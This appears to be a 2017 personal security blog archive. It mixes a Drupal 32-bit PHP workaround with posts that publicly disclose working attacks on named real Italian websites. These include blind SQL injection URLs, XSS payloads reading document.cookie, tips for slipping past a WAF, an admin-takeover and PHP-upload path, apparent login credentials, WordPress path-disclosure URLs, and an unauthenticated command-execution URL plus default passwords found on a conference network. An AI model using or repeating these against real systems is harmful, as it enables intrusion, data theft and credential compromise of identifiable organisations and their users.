Skip to main content

Posts

Showing posts from November, 2017

How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32bit version of PHP. If you want to install drupal on your TEST server even if you have a 32bit version of php you need to edit: core/modules/system/system.install and comment out ( ~line 973):   if (PHP_INT_SIZE <= 4) {     $requirements['limited_date_range'] = [       'title' => t('Limited date range'),       'value' => t('Your PHP installation has a limited date range.'),       'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),       'severity' => REQUIREMENT_WARNING,     ];   } It's highly suggested to update to a recent 64bit ver

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc. - http://www.dieti.unina.it Ubuntu Joomla 2.5.8 Admin can be changed (admin takeover) even if there's the external login for the users. php files  can be uploaded via administrator/components/com_media/helpers/media.php com_gcalendar  is vulnerable and should be upgraded to dpcalendar. --- http://www.digita.unina.it/ wordpress 4.8.1 http://www.digita.unina.it/digita/wp-login.php sds_dj32f lizzi --- http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql] archived error:http://archive.is/Zw3Ua /home/httpd/elettrotecnica/grupponazionale/ --- XSS http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E --- SQL Injection http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7 sample error archived: http://archive

sefsas.it | sql injection

Sql Injection in the email confirmation url (there are several other): http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id] ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999 archived: http://archive.is/kwwXf full query sample in output http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999 SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP='' archived:http://archive.is/xDVeh
XSS https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script> SQL Injection https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici archived error:http://archive.is/9bJfo

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple Fix: if ( ! defined ( ' ABSPATH ' )) exit ; _________ Urls that can give you errors with local folder paths on Wordpress 4.8.3 and previous versions: /wp-includes/customize/class-wp-customize-background-image-control.php /wp-includes/customize/class-wp-customize-background-image-setting.php /wp-includes/customize/class-wp-customize-background-position-control.php /wp-includes/customize/class-wp-customize-color-control.php /wp-includes/customize/class-wp-customize-cropped-image-control.php /wp-includes/customize/class-wp-customize-custom-css-setting.php /wp-includes/customize/class-wp-customize-filter-setting.php /wp-includes/customize/class-wp-customize-header-image-control.php /wp-includes/customize/class-wp-customize-header-image-setting.php /wp-includes/customize/class-wp-customize-image-control.php /wp-includes/customize/class-wp-customize-media-control.php /wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php /wp-includes/custo

linux day 2017 guardia san framondi - various stuff discovered

During the linux day 2017 at guardia sanframondi I played with my phone on the local network ... with the browser (and google to get informations on vulnerabilities). -Linuxday wifi- daloRADIUS default password user:administrator password:radius admin/admin ip:192.168.1.249 http://192.168.1.249 Ubiquity device (wifi antenna/ap)  ip:192.168.1.20 Unauthenticated command execution https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]